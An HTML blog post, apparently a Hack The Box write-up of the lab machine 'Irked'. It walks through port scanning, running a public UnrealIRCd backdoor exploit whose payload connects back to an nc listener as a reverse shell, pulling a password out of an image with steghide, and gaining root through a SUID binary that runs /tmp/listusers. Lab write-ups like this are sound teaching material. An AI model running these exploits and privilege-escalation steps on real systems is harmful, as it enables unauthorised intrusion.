<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.7.2"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Hack The Box - Irked (Without Metasploit)" /><meta name="author" content="rizemon" /><meta property="og:locale" content="en_US" /><meta name="description" content="Just bloggin cyber security related content." /><meta property="og:description" content="Just bloggin cyber security related content." /><link rel="canonical" href="https://rizemon.github.io/posts/irked-htb/" /><meta property="og:url" content="https://rizemon.github.io/posts/irked-htb/" /><meta property="og:site_name" content="rizemon’s blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-21T00:31:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hack The Box - Irked (Without Metasploit)" /><meta name="twitter:site" content="@rizemon" /><meta name="twitter:creator" content="@rizemon" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"rizemon"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://rizemon.github.io/posts/irked-htb/"},"description":"Just bloggin cyber security related content.","url":"https://rizemon.github.io/posts/irked-htb/","@type":"BlogPosting","headline":"Hack The Box - Irked (Without Metasploit)","dateModified":"2021-01-21T00:31:00+08:00","datePublished":"2021-01-21T00:31:00+08:00","@context":"https://schema.org"}</script><title>Hack The Box - Irked (Without Metasploit) | rizemon's blog</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/portfolio.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">rizemon's blog</a></div><div class="site-subtitle font-italic">Cyber Security Enthusiast.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/tabs/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tabs/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/tabs/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tabs/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT ME</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/rizemon" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/rizemon" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['',''].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-6" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Hack The Box - Irked (Without Metasploit)</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hack The Box - Irked (Without Metasploit)</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Thu, Jan 21, 2021, 12:31 AM +0800" > Jan 21, 2021 <i class="unloaded">2021-01-21T00:31:00+08:00</i> </span> by <span class="author"> rizemon </span></div><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1302 words">7 min</span></div></div><div class="post-content"><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/irked.png" alt="" height="414px" width="615px" /></p><h1 id="configuration">Configuration</h1><p>The operating system that I will be using to tackle this machine is a Kali Linux VM.</p><p>What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to <code class="language-plaintext highlighter-rouge">/etc/hosts</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"10.10.10.117 irked.htb"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /etc/hosts 
</pre></table></code></div></div><h1 id="reconnaissance">Reconnaissance</h1><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
</pre><td class="rouge-code"><pre>rustscan <span class="nt">--accessible</span> <span class="nt">-a</span> irked.htb <span class="nt">-r</span> 1-65535 <span class="nt">--</span> <span class="nt">-sT</span> <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-Pn</span>
File limit higher than batch size. Can increase speed by increasing batch size <span class="s1">'-b 1048476'</span><span class="nb">.</span>
Open 10.10.10.117:22
Open 10.10.10.117:80
Open 10.10.10.117:111
Open 10.10.10.117:6697
Open 10.10.10.117:8067
Open 10.10.10.117:41521
Open 10.10.10.117:65534
Starting Script<span class="o">(</span>s<span class="o">)</span>
Script to be run Some<span class="o">(</span><span class="s2">"nmap -vvv -p  "</span><span class="o">)</span>

Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-01-20 12:17 UTC
NSE: Loaded 151 scripts <span class="k">for </span>scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Connect Scan at 12:17
Scanning irked.htb <span class="o">(</span>10.10.10.117<span class="o">)</span> <span class="o">[</span>7 ports]
Discovered open port 111/tcp on 10.10.10.117
Discovered open port 22/tcp on 10.10.10.117
Discovered open port 80/tcp on 10.10.10.117
Discovered open port 65534/tcp on 10.10.10.117
Discovered open port 6697/tcp on 10.10.10.117
Discovered open port 41521/tcp on 10.10.10.117
Discovered open port 8067/tcp on 10.10.10.117
Completed Connect Scan at 12:17, 0.01s elapsed <span class="o">(</span>7 total ports<span class="o">)</span>
Initiating Service scan at 12:17
Scanning 7 services on irked.htb <span class="o">(</span>10.10.10.117<span class="o">)</span>
Completed Service scan at 12:17, 11.06s elapsed <span class="o">(</span>7 services on 1 host<span class="o">)</span>
NSE: Script scanning 10.10.10.117.
NSE: Starting runlevel 1 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.64s elapsed
NSE: Starting runlevel 2 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 12:17
NSE Timing: About 98.33% <span class="k">done</span><span class="p">;</span> ETC: 12:18 <span class="o">(</span>0:00:01 remaining<span class="o">)</span>
Completed NSE at 12:18, 60.00s elapsed
NSE: Starting runlevel 3 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
Nmap scan report <span class="k">for </span>irked.htb <span class="o">(</span>10.10.10.117<span class="o">)</span>
Host is up, received user-set <span class="o">(</span>0.0067s latency<span class="o">)</span><span class="nb">.</span>
Scanned at 2021-01-20 12:17:47 UTC <span class="k">for </span>72s

PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u4 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad <span class="o">(</span>DSA<span class="o">)</span>
| ssh-dss AAAAB3NzaC1kc3MAAACBAI+wKAAyWgx/P7Pe78y6/80XVTd6QEv6t5ZIpdzKvS8qbkChLB7LC+/HVuxLshOUtac4oHr/IF9YBytBoaAte87fxF45o3HS9MflMA4511KTeNwc5QuhdHzqXX9ne0ypBAgFKECBUJqJ23Lp2S9KuYEYLzUhSdUEYqiZlcc65NspAAAAFQDwgf5Wh8QRu3zSvOIXTk+5g0eTKQAAAIBQuTzKnX3nNfflt++gnjAJ/dIRXW/KMPTNOSo730gLxMWVeId3geXDkiNCD/zo5XgMIQAWDXS+0t0hlsH1BfrDzeEbGSgYNpXoz42RSHKtx7pYLG/hbUr4836olHrxLkjXCFuYFo9fCDs2/QsAeuhCPgEDjLXItW9ibfFqLxyP2QAAAIAE5MCdrGmT8huPIxPI+bQWeQyKQI/lH32FDZb4xJBPrrqlk9wKWOa1fU2JZM0nrOkdnCPIjLeq9+Db5WyZU2u3rdU8aWLZy8zF9mXZxuW/T3yXAV5whYa4QwqaVaiEzjcgRouex0ev/u+y5vlIf4/SfAsiFQPzYKomDiBtByS9XA<span class="o">==</span>
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 <span class="o">(</span>RSA<span class="o">)</span>
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b <span class="o">(</span>ECDSA<span class="o">)</span>
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8<span class="o">=</span>
|   256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c <span class="o">(</span>ED25519<span class="o">)</span>
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj
80/tcp    open  http    syn-ack Apache httpd 2.4.10 <span class="o">((</span>Debian<span class="o">))</span>
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.10 <span class="o">(</span>Debian<span class="o">)</span>
|_http-title: Site doesn<span class="s1">'t have a title (text/html).
111/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35316/tcp6  status
|   100024  1          41521/tcp   status
|   100024  1          53146/udp   status
|_  100024  1          56568/udp6  status
6697/tcp  open  irc     syn-ack UnrealIRCd
8067/tcp  open  irc     syn-ack UnrealIRCd
41521/tcp open  status  syn-ack 1 (RPC #100024)
65534/tcp open  irc     syn-ack UnrealIRCd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.29 seconds
</span></pre></table></code></div></div><h1 id="enumeration-1">Enumeration (1)</h1><h2 id="port-80-apache-httpd-2410-debian">Port 80 <code class="language-plaintext highlighter-rouge">Apache httpd 2.4.10 ((Debian))</code></h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/irked1.png" alt="" /></p><p>The message at the bottom right might perhaps be referring to the <code class="language-plaintext highlighter-rouge">IRC</code> service that found via <code class="language-plaintext highlighter-rouge">nmap</code>.</p><h2 id="port-6697-unrealircd">Port 6697 <code class="language-plaintext highlighter-rouge">UnrealIRCd</code></h2><p>Using a <code class="language-plaintext highlighter-rouge">nmap</code> script, we see that this <code class="language-plaintext highlighter-rouge">unrealircd</code> has a backdoor.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-sV</span> <span class="nt">--script</span><span class="o">=</span>irc-unrealircd-backdoor <span class="nt">-p</span> 6697 irked.htb
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-01-20 07:21 EST
Nmap scan report <span class="k">for </span>irked.htb <span class="o">(</span>10.10.10.117<span class="o">)</span>
Host is up <span class="o">(</span>0.0095s latency<span class="o">)</span><span class="nb">.</span>

PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>18.44 seconds
</pre></table></code></div></div><h1 id="exploitation-1">Exploitation (1)</h1><p>Using this <a href="https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor">script</a>, I was able to make use of the backdoor and spawn a shell.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>python3 exploit.py <span class="nt">-payload</span> python irked.htb 6697
Exploit sent successfully!
</pre></table></code></div></div><p>After a while, on our <code class="language-plaintext highlighter-rouge">nc</code> listener that we setup beforehand, we see that we get a shell as <code class="language-plaintext highlighter-rouge">ircd</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="nv">$ </span>rlwrap nc <span class="nt">-lvnp</span> 1337
listening on <span class="o">[</span>any] 1337 ...
connect to <span class="o">[</span>10.10.XX.XX] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.117] 45622
<span class="nb">id
id
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>ircd<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>ircd<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>ircd<span class="o">)</span>
ircd@irked:~/Unreal3.2<span class="err">$</span>
</pre></table></code></div></div><h1 id="enumeration-2">Enumeration (2)</h1><p>In the home directory of another user <code class="language-plaintext highlighter-rouge">djmardov</code>, apart from the <code class="language-plaintext highlighter-rouge">user.txt</code> that we have no access to, there was a file called <code class="language-plaintext highlighter-rouge">.backup</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>ircd@irked:~/Unreal3.2<span class="nv">$ </span><span class="nb">cat</span> .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
</pre></table></code></div></div><p>I tried logging in with <code class="language-plaintext highlighter-rouge">UPupDOWNdownLRlrBAbaSSss</code>, but unfortunately it was the wrong password. The file said something about <code class="language-plaintext highlighter-rouge">steg</code>, as in steganography? Perhaps the image we saw on the web server is hiding something?</p><p>After installing <code class="language-plaintext highlighter-rouge">steghide</code>, I used it to check if there is anything hidden in the image.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre><span class="nv">$ </span>steghide info irked.jpg 
<span class="s2">"irked.jpg"</span>:
  format: jpeg
  capacity: 1.5 KB
Try to get information about embedded data ? <span class="o">(</span>y/n<span class="o">)</span> y
Enter passphrase: 
  embedded file <span class="s2">"pass.txt"</span>:
    size: 17.0 Byte
    encrypted: rijndael-128, cbc
    compressed: <span class="nb">yes</span>
</pre></table></code></div></div><p>It tells us that there is a file called <code class="language-plaintext highlighter-rouge">pass.txt</code>! Lets extract it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="nv">$ </span>steghide extract <span class="nt">-sf</span> irked.jpg
Enter passphrase: 
wrote extracted data to <span class="s2">"pass.txt"</span>

<span class="nv">$ </span><span class="nb">cat </span>pass.txt
Kab6h+m+bbp2J:HG
</pre></table></code></div></div><p>Could this be the password?</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>ircd@irked:~/Unreal3.2<span class="nv">$ </span>su djmardov
Kab6h+m+bbp2J:HG

djmardov@irked:~/Documents<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>djmardov<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>djmardov<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>djmardov<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,108<span class="o">(</span>netdev<span class="o">)</span>,110<span class="o">(</span>lpadmin<span class="o">)</span>,113<span class="o">(</span>scanner<span class="o">)</span>,117<span class="o">(</span>bluetooth<span class="o">)</span>
</pre></table></code></div></div><p>We managed to login as <code class="language-plaintext highlighter-rouge">djmardov</code>.</p><h1 id="usertxt">user.txt</h1><p>The user flag is in <code class="language-plaintext highlighter-rouge">djmardov</code>’s <code class="language-plaintext highlighter-rouge">Documents</code> directory.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>djmardov@irked:~/Documents<span class="nv">$ </span><span class="nb">cat </span>user.txt
4a66XXXXXXXXXXXXXXXXXXXXXXXXXXXX
</pre></table></code></div></div><h1 id="enumeration-3">Enumeration (3)</h1><p>Using <a href="https://github.com/diego-treitos/linux-smart-enumeration"><code class="language-plaintext highlighter-rouge">linux-smart-enumeration</code></a>, we see that there is a <code class="language-plaintext highlighter-rouge">SUID</code> binary <code class="language-plaintext highlighter-rouge">viewuser</code> that stood out.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>djmardov@irked:/tmp<span class="nv">$ </span>./lse.sh
...
<span class="o">[</span><span class="k">*</span><span class="o">]</span> fst010 Binaries with setuid bit........................................ <span class="nb">yes</span><span class="o">!</span>                                   
<span class="o">[!]</span> fst020 Uncommon setuid binaries........................................ <span class="nb">yes</span><span class="o">!</span>                                   
<span class="nt">---</span>
/usr/bin/X
/usr/bin/viewuser
...
</pre></table></code></div></div><p>Upon running <code class="language-plaintext highlighter-rouge">viewuser</code>, we see that it is looking for a file called <code class="language-plaintext highlighter-rouge">/tmp/listusers</code> but it doesn’t exist. Could it perhaps be trying to execute it?</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>djmardov@irked:/tmp<span class="nv">$ </span>viewuser
This application is being devleoped to <span class="nb">set </span>and <span class="nb">test </span>user permissions
It is still being actively developed
<span class="o">(</span>unknown<span class="o">)</span> :0           2021-01-20 08:03 <span class="o">(</span>:0<span class="o">)</span>
sh: 1: /tmp/listusers: not found
</pre></table></code></div></div><h1 id="exploitation-2">Exploitation (2)</h1><p>Lets create <code class="language-plaintext highlighter-rouge">/tmp/listusers</code> that will contain the <code class="language-plaintext highlighter-rouge">/bin/bash</code> command.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>djmardov@irked:/tmp<span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"/bin/bash"</span> <span class="o">&gt;</span> /tmp/listusers
djmardov@irked:/tmp<span class="nv">$ </span><span class="nb">chmod</span> +x /tmp/listusers
</pre></table></code></div></div><p>And then we run <code class="language-plaintext highlighter-rouge">/tmp/listusers</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>djmardov@irked:/tmp<span class="nv">$ </span>viewuser
This application is being devleoped to <span class="nb">set </span>and <span class="nb">test </span>user permissions
It is still being actively developed
<span class="o">(</span>unknown<span class="o">)</span> :0           2021-01-20 08:03 <span class="o">(</span>:0<span class="o">)</span>
root@irked:/tmp# <span class="nb">id
